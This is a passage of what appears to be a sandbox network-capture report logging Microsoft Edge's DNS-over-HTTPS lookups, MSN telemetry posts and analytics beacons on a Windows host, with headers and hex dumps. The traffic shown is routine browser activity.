                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                            Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.449809162.159.61.34435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:05 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 128
                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                            Accept-Language: *
                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            2025-01-06 22:05:05 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                            2025-01-06 22:05:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:05 GMT
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            CF-RAY: 8fdf01ec9b95f795-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            2025-01-06 22:05:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 10 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: wwwgstaticcom@C)


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.449808172.64.41.34435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:05 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 128
                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                            Accept-Language: *
                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            2025-01-06 22:05:05 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                            2025-01-06 22:05:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:05 GMT
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            CF-RAY: 8fdf01ec9b1343d4-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            2025-01-06 22:05:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: wwwgstaticcom$Pc)


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.449810172.64.41.34435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:05 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 128
                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                            Accept-Language: *
                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            2025-01-06 22:05:05 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                            2025-01-06 22:05:05 UTC247INHTTP/1.1 200 OK
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:05 GMT
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            CF-RAY: 8fdf01ed4d504387-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            2025-01-06 22:05:05 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: wwwgstaticcom)


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.449818162.159.61.34435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 128
                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                            Accept-Language: *
                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            2025-01-06 22:05:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 55 00 0c 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: assetsmsncom)UQ
                                                                                                                                                            2025-01-06 22:05:06 UTC247INHTTP/1.1 200 OK
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:06 GMT
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            CF-RAY: 8fdf01f34bac42cc-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            2025-01-06 22:05:06 UTC468INData Raw: 00 00 81 80 00 01 00 0b 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 54 45 00 1c 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 07 65 64 67 65 6b 65 79 03 6e 65 74 00 c0 2c 00 05 00 01 00 00 03 69 00 16 06 65 32 38 35 37 38 01 64 0a 61 6b 61 6d 61 69 65 64 67 65 c0 43 c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 1c c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 1a c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 1b c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 20 c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 1f c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 22 c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 1d c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 21 c0 54 00 01 00 01 00 00 00 09 00 04 17 c8 58 1e 00 00 29 04 d0
                                                                                                                                                            Data Ascii: assetsmsncomTEassetsmsncomedgekeynet,ie28578dakamaiedgeCTXTXTXTX TXTX"TXTX!TX)


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.449817162.159.61.34435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 128
                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                            Accept-Language: *
                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            2025-01-06 22:05:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 55 00 0c 00 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: assetsmsncomA)UQ
                                                                                                                                                            2025-01-06 22:05:06 UTC247INHTTP/1.1 200 OK
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:06 GMT
                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                            Connection: close
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Content-Length: 468
                                                                                                                                                            CF-RAY: 8fdf01f348f70f70-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            2025-01-06 22:05:06 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 53 aa 00 1c 06 61 73 73 65 74 73 03 6d 73 6e 03 63 6f 6d 07 65 64 67 65 6b 65 79 03 6e 65 74 00 c0 2c 00 05 00 01 00 00 02 ce 00 16 06 65 32 38 35 37 38 01 64 0a 61 6b 61 6d 61 69 65 64 67 65 c0 43 c0 5b 00 06 00 01 00 00 03 32 00 2e 03 6e 30 64 c0 5d 0a 68 6f 73 74 6d 61 73 74 65 72 06 61 6b 61 6d 61 69 c0 17 67 7c 52 d8 00 00 03 e8 00 00 03 e8 00 00 03 e8 00 00 07 08 00 00 29 04 d0 00 00 00 00 01 25 00 0c 01 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii: assetsmsncomASassetsmsncomedgekeynet,e28578dakamaiedgeC[2.n0d]hostmasterakamaig|R)%!


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            9192.168.2.44978618.244.18.324435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:07 UTC925OUTGET /b?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            2025-01-06 22:05:07 UTC956INHTTP/1.1 302 Found
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:07 GMT
                                                                                                                                                            Location: /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                            set-cookie: UID=10A5c11b12c97664656d6bc1736201107; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                            set-cookie: XID=10A5c11b12c97664656d6bc1736201107; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                            Via: 1.1 872b8cb7808b8e013ecc6c3cc24aa826.cloudfront.net (CloudFront)
                                                                                                                                                            X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                            X-Amz-Cf-Id: QuIKagpYhrlDpOkCzT-pBHv7iU8JpPOQxCE37NvKODrXXL5CelBihg==


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            10192.168.2.44984720.189.173.44435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:08 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736201107291&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                            Host: browser.events.data.msn.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 3856
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            Content-Type: text/plain;charset=UTF-8
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            Cookie: _C_ETH=1; USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1
                                                                                                                                                            2025-01-06 22:05:08 UTC3856OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 36 54 32 32 3a 30 35 3a 30 37 2e 32 38 37 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 39 31 39 35 33 39 37 37 2d 34 34 63 34 2d 34 37 30 38 2d 62 38 35 37 2d 63 39 37 39 61 31 38 36 36 36 61 38 22 2c 22 65 70 6f 63 68 22 3a 22 37 36 37 31 37 38 39 38 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-06T22:05:07.287Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"91953977-44c4-4708-b857-c979a18666a8","epoch":"767178987"},"app":{"locale"
                                                                                                                                                            2025-01-06 22:05:08 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                            Set-Cookie: MC1=GUID=315f1acc0ca243a2a88711bd08f3ea39&HASH=315f&LV=202501&V=4&LU=1736201108692; Domain=.microsoft.com; Expires=Tue, 06 Jan 2026 22:05:08 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            Set-Cookie: MS0=67e93195282a489d980309644e92b841; Domain=.microsoft.com; Expires=Mon, 06 Jan 2025 22:35:08 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                            time-delta-millis: 1401
                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:08 GMT
                                                                                                                                                            Connection: close


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            11192.168.2.449849108.139.47.504435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:08 UTC1012OUTGET /b2?rn=1736201107294&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=04956DB2EAC862DE2FFB78DEEBAA63F6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                            Host: sb.scorecardresearch.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            Cookie: UID=10A5c11b12c97664656d6bc1736201107; XID=10A5c11b12c97664656d6bc1736201107
                                                                                                                                                            2025-01-06 22:05:08 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:05:08 GMT
                                                                                                                                                            Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                            X-Cache: Miss from cloudfront
                                                                                                                                                            Via: 1.1 2c6a244ba6cf015578de7d0a0b6908d4.cloudfront.net (CloudFront)
                                                                                                                                                            X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                            X-Amz-Cf-Id: ELWoomUO6tqwAarym1l7cH-HV9p2yJTduU9Qj87Qkm76ShNOlY77jw==


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            12192.168.2.44985620.110.205.1194435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:09 UTC1261OUTGET /c.gif?rnd=1736201107293&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b231fc407e8e42d98aaddb9cf46080a1&activityId=b231fc407e8e42d98aaddb9cf46080a1&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=E04C6472ECD84BAC8F19BD5E6C9ADC9E&MUID=04956DB2EAC862DE2FFB78DEEBAA63F6 HTTP/1.1
                                                                                                                                                            Host: c.msn.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            Cookie: USRLOC=; MUID=04956DB2EAC862DE2FFB78DEEBAA63F6; _EDGE_S=F=1&SID=3A3B7FB8C795636D2C5D6AD4C6106231; _EDGE_V=1; SM=T
                                                                                                                                                            2025-01-06 22:05:09 UTC982INHTTP/1.1 200 OK
